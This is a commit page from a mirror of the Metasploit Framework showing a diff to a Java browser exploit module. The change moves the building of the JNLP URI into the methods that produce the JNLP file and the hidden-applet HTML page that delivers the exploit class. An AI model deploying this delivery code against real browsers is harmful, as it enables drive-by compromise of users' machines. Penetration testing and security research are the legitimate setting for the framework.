infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Build the jnlp uri when resource is available

unstable
jvazquez-r7 2013-04-25 10:28:34 -05:00 committed by sinn3r
parent cc961977a2
commit 8eea476cb8
1 changed files with 13 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
modules/exploits/multi/browser/java_jre17_reflection_types.rb
View File

@ -93,17 +93,19 @@ class Metasploit3 < Msf::Exploit::Remote
@exploit_class_name = rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit", @exploit_class_name)
@jnlp_uri = ((datastore['SSL']) ? "https://" : "http://")
@jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
@jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(8)}.jnlp"
@jnlp_name = rand_text_alpha(8)
super
end
def jnlp_file
%Q|
jnlp_uri = ((datastore['SSL']) ? "https://" : "http://")
jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
jnlp = %Q|
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{@jnlp_uri}">
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
<information>
<title>Applet Test JNLP</title>
<vendor>#{rand_text_alpha(8)}</vendor>
@ -121,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
<update check="background"/>
</jnlp>
|
return jnlp
end
def on_request_uri(cli, request)
@ -161,11 +164,15 @@ class Metasploit3 < Msf::Exploit::Remote
end
def generate_html
jnlp_uri = ((datastore['SSL']) ? "https://" : "http://")
jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
html = %Q|
<html>
<body>
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
<param name="app" value="#{@jnlp_uri}">
<param name="app" value="#{jnlp_uri}">
<param name="back" value="true">
<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</object>